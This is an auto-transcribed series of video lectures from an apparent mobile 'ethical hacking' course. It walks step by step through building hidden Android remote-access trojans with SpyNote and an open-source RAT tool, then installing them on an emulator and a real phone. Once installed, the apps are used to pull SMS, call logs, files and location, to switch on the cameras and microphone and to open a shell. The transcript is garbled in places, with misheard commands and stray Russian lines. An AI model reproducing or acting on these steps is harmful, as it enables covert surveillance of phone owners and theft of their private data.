want. Close this. You can open SMS manager, call manager, contacts manager, location manager, account manager, camera manager, but this is a virtual system. We can't open a camera on it. And this is a microphone, an application. When we open application, we can see all the application on our hacking phone. Close. This is a microphone. Click start. Now it's started, and I can hear my sound. Click stop. Setting. This is setting of our hacking phone. We can changing anything we want. Anything we want to changing, we can change. And as you can see, we are successfully hacking a phone by a spy node tools, and we are finishing the lecture today. See you in the next lecture. Hello and welcome to Ethical Hacking for Mobile Device course. Today we will test our hacking application which we made by a spy node on a real phone. Let's begin. Open a spy node. Click OK and tools payload. Test our IP. IP config. Okay, I will create wireless LAN adapter Wi-Fi and take this IP 1.7 1.7. Unselected hide application. And build. Okay, close and close this. Now we must open a spy node. Close this. Click OK and close this. Take this application to install on our real phone. And as you can see, it's installing here.
Новый пользователь.
And as you can see, we are hacked the real phone. Now we want to see what we can do on it. We can open file manager. As you can see, this is a file manager, and SMS manager. And as you can see, also the SMS we found. Close this, back and close SMS manager, call manager, content manager, location manager, account manager. Okay, open camera manager, camera 0 for back, camera 1 for front. Okay, let's test start. The phone is put on the table, so we can open camera back. Okay, camera 1, start, and as you can see, we can open the camera front and back, stop, close this, from application to see what application installing on this phone. And as you can see, all the application we want to see. Keylogger setting to see all the settings of the phone. As you can see, the Android version is 11. If I click chat, I will open a chat to the phone. If I click hi, okay, as you can see, we are opening a chat.
Пользователь отсоединен.
Hi here and hi here. And if I tell him I am the hacker and enter, as you can see here, like from chat we can open a chat with our victim phone. Okay, it's bang, it's bang here. Okay, close. If I want to call anyone from here, I can call, and as you can see, we are successfully hacked a real phone by a spy note tool, and we are finishing the lecture today. See you in the next lecture. Hello and welcome to Oscar Hacking for Mobile Device course. Today you will learn how to install the framework of a new tools which is called Android. Let's begin. We will Google search bar and write Android. Get hub and click here. So scroll down and in installation copy the line 1 and open a terminal and paste here and enter. Okay, it's cloning our Android tool. Okay, it's complete. So copy the line 2 and paste here. If I run this command, it will be a fault, so I need to create a virtual data here. So to build this, run Python 3 -m venv and enter. To create a virtual data here in a Android file. So it's created a venv. To active we need to run to active venv we need to run source venv dash bin dash activate and enter. So as you can see, it's added venv here. So copy the line 3 and paste and enter. Okay, so importing all library we need, and as you can see, we are successfully build our framework for a new tools Android, and in the next video I will show you how we can test these tools. See you in the next video. Hello and welcome to Oscar Hacking for Mobile Device course. Today we will learn how to create and test our hacking application. We will create it by the Android tools. Let's begin. Now we need to open a terminal, and in terminal ls So here under it, copy and type cd and paste the Android file. So here we need to active Vim. So type source vim dash bin dash active activate and enter. Now the Vim is active, so we need now to build our hacking application. To build our hacking application, we have two commands. Command 1 and command 2. I will use command 2 because I want to put my IP to receive a signal from hacking phone to it. So we will use this command. We're in terminal again and take this, copy and paste here. We have for argument IP port output icon. I will not use icon because at default set to hidden. So when we installing our hacking application to the phone, it will be hidden. So dash I and open a new terminal, type fconfig to new our IP. So this is IP, copy and paste here, dash B for port, type 2526, dash O to the name. I will set Andrew rate dot ebk and enter. Okay, it's building our hacking application Andrew rate ebk. Okay, it's built in Android file android.abk. So go to file, Android here and copy the abk. Go to a desktop and paste here. So open the LD, I need now to uninstall the rate abk. I tested before, so I need to go in setting, app, delete this. uninstall this again also. And uninstall this. Okay, back and take our Android APK and install. Okay, it's installing here. Google Serve Framework. Now open Linux. And open a terminal. Sorry. Back to our GitHub file. And for shell mode, to receive a signal, we need to copy this. Copy. And paste here. Type our IP. Paste here and type our port and enter. And as you can see, it's waiting for connection. So we need to open the LD again and click on our hacking app, and as you can see, when we clicked, we receive a signal. So as you can see, and the program is hidden when we open for a first time. Now we need to test the command what can do on our hacking phone. We have a device info and the explanation of it. And we have cam list, return a camera ID, take a picture from camera, start video, start audio, stop audio, get SMS, call logs, shell to open a shell, vibrate to vibrate a phone, get location, get IP, get same details, and get a MAC address. So I will test device info and paste here and enter. As you can see, it's turning all info of device we hacked. So we need to get IP, test get IP, and best selection. And as you can see, the device IP, test also, start audio, and best selection, and enter. It's starting recording audio, stop audio to stop capture audio. So best stop audio, and as you can see, it's downloading audio on Android dumps. So open a file and dumps here, and here the audio here record. So 15 seconds. Now test get MAC address. Sorry, best selection here. The phone didn't have MAC address. Get location. Not a real location because we use a emulator, not a real phone. So this location is not a real. And as you can see, we are successfully having a connection with a phone, and we are finishing the lecture today. See you in the next video. Hello and welcome to Skill Hacking for Mobile Device course. Today we will test our hacking application we created by Android on a real phone. Let's begin. Open a terminal and type ls, copy Android file, name, and type cd and Android file. Here we want to active a VM, so type source VM bin activate. Okay, it's active successfully. Now going to a desktop and open our real phone, and here install our hacking application on a real phone. And as you can see, it is installing successfully. Click to open and click follow, and as you can see, when we're opening, it's heading on a phone. So now we need to test if we are receiving a connection from our real phone or not. So open Kali Linux and type Python 3 before this type ls, and here type Python 3 and Android .py dash shell dash I for IP 192.168 168.20.99. Let's be sure if the config is right. So okay, it's right. I'm back and dash B 2526 and enter. I'm having something wrong. Let's see a shell command. Okay, 2// back and here type /k, and as you can see when we press OK, it's receive a signal from a phone in Phoenix. So click type device info and enter, and as you can see version of Android 11. Okay, as you can see this is our information. Come back to our phone and go in this, back, scroll down here, about phone, Android 11, and this is a correct information. So we need to open start audio, copy, let's test. Cam list, copy, base selection, enter. The back camera, here ID 0, and front camera has ID 1. So if we need to take a back, only type take back and 0 for back, 1 for front. Start video, type start video, 0 for start video from back and 1 for front. Start audio and stop audio to record audio. Get SMS inbox. Let's copy this to try. Base selection, get SMS inbox. To get in inbox SMS, it will take small time. Okay, save the in dumps inbox, open dumps inbox. You see here, click to open, and as you can see, all the SMS here, the number of SMS on a real phone. So back to terminal, get call logs to return call logs file, vibrate to vibrate phone, get IP. Let's try this. A selection, enter, and this IP, the phone took from a local network. Get clip data, copy, and paste selection here, no clipped data present. Get MAC address, copy, and paste selection here. And as you can see, this is all a command that we can do on a real phone. So as you can see, we can remotely having complete remotely in a real phone. And we are finishing the lecture today. See you in the next lecture.